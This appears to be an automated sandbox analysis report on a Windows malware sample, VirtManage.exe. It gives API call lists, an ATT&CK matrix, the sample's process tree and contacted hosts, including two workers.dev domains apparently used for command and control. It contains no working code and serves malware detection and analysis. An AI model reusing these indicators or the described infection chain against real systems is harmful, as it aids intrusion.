Source: C:\Users\user\Desktop\VirtManage.exe | Code function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\msiexec.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\503006091D97D4F5AE39F7CBE7927D7D652D3431 Blob
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0049C5F0 sqlite3_db_handle,sqlite3_bind_parameter_count,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_prepare_v2,sqlite3_bind_blob,sqlite3_bind_text,sqlite3_step,sqlite3_column_text,sqlite3_column_type,sqlite3_step,gcry_free,sqlite3_reset,sqlite3_errstr,strlen,sqlite3_malloc,memcpy,sqlite3_column_count,gcry_xmalloc,sqlite3_column_name,sqlite3_errmsg,strlen,sqlite3_malloc,memcpy,sqlite3_finalize,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,gpgrt_log_fatal,gpgrt_log_fatal,strlen,_gpg_w32_gettext,1_2_0049C5F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004AC8D0 _gpg_w32_bindtextdomain,_gpg_w32_textdomain,1_2_004AC8D0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0049C5F0 sqlite3_db_handle,sqlite3_bind_parameter_count,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_prepare_v2,sqlite3_bind_blob,sqlite3_bind_text,sqlite3_step,sqlite3_column_text,sqlite3_column_type,sqlite3_step,gcry_free,sqlite3_reset,sqlite3_errstr,strlen,sqlite3_malloc,memcpy,sqlite3_column_count,gcry_xmalloc,sqlite3_column_name,sqlite3_errmsg,strlen,sqlite3_malloc,memcpy,sqlite3_finalize,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,_gpgrt_log_assert,gpgrt_log_fatal,gpgrt_log_fatal,gpgrt_log_fatal,strlen,_gpg_w32_gettext,3_2_0049C5F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_004AC8D0 _gpg_w32_bindtextdomain,_gpg_w32_textdomain,3_2_004AC8D0
ATT&CK matrix, listed per tactic (badge values from the matrix cells in parentheses):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (1); Command and Scripting Interpreter (112); Service Execution (1); PowerShell (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); DLL Search Order Hijacking (1); Windows Service (1); Office Application Startup (1); Registry Run Keys / Startup Folder (1); RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: DLL Side-Loading (1); DLL Search Order Hijacking (1); Access Token Manipulation (1); Windows Service (1); Process Injection (11); Registry Run Keys / Startup Folder (1); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); DLL Side-Loading (1); DLL Search Order Hijacking (1); Masquerading (11); Virtualization/Sandbox Evasion (131); Access Token Manipulation (1); Process Injection (11)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: Peripheral Device Discovery (11); File and Directory Discovery (2); System Information Discovery (125); Security Software Discovery (211); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1632485, Sample: VirtManage.exe, Startdate: 08/03/2025, Architecture: WINDOWS, Score: 46
Top-level signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 3 other signatures
Contacted hosts: nginx-server.paxivo2460.workers.dev (188.114.96.3, port 443, CLOUDFLARENETUS, European Union); ec2-server.bayaj19162.workers.dev (172.67.153.11, port 443, CLOUDFLARENETUS, United States); 127.0.0.1 (unknown)

Process tree (child processes indented under their parent; dropped files and per-process signatures noted inline):
VirtManage.exe (dropped: C:\Users\user\AppData\Local\...\nsis7z.dll, PE32; C:\Users\user\AppData\Local\...\nsExec.dll, PE32; C:\ProgramData\Microsoft\...\winapi.exe, PE32+; 9 other malicious files)
    winapi.exe (signatures: Suspicious powershell command line found; Obfuscated command line found)
        powershell.exe (contacts nginx-server.paxivo2460.workers.dev 188.114.96.3:443; signatures: Uses whoami command line tool to query computer and username; Loading BitLocker PowerShell Module; dropped: C:\Users\user\AppData\...\2s4bn4bw.cmdline, Unicode)
            csc.exe (dropped: C:\Users\user\AppData\Local\...\2s4bn4bw.dll, PE32)
                cvtres.exe
            conhost.exe
            whoami.exe
    msiexec.exe (dropped: C:\Users\user\AppData\Local\...\MSI2CE4.tmp, PE32; C:\Users\user\AppData\Local\...\MSI2C66.tmp, PE32)
    gpg.exe (dropped: C:\ProgramData\Microsoft\...\7za.dll, PE32+)
        conhost.exe
    7 other processes (dropped: C:\ProgramData\Microsoft\...\7za.exe, PE32+)
        conhost.exe
        conhost.exe
        5 other processes
winapi.exe (signatures: Suspicious powershell command line found; Obfuscated command line found)
    powershell.exe (contacts ec2-server.bayaj19162.workers.dev 172.67.153.11:443; signature: Uses whoami command line tool to query computer and username)
        csc.exe (dropped: C:\Users\user\AppData\Local\...\e3jseyke.dll, PE32)
            cvtres.exe
        2 other processes
msiexec.exe
    msiexec.exe
        7za.exe (dropped: C:\ProgramData\Microsoft\...\winapi.exe, PE32+; C:\ProgramData\Microsoft\...\aclui.dll, PE32+; C:\ProgramData\Microsoft\...\aclui-2.dll, PE32+)
        2 other processes
svchost.exe (contacts 127.0.0.1)